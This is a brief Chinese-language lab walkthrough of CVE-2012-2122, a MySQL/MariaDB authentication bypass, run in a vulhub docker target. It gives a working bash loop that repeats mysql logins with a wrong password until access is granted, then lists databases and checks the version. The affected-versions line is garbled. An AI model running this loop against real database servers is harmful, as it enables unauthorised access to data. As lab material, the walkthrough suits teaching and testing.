漏洞影响版本

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

演示

开启靶场

进入漏洞目录

cd /root/vulhub/mysql/CVE-2012-2122

开启漏洞靶场

docker-compose up -d

攻击

直接 运行 这个命令

for i in `seq 1 100`;do mysql -uroot -p11111 -h 192.168.61.128 -P3306;donefor i in `seq 1 1000`;do mysql -u(账号不用正确) -p(密码不用正确) -h(MySQLIP地址) -P3306;done

这个命令的意思就是：for语句调用终端去连接MySQL，如果存在这个漏洞，他就会不断的去尝试进入 MySQL 数据库中

显示数据库

show databases;

显示数据库版本

select version();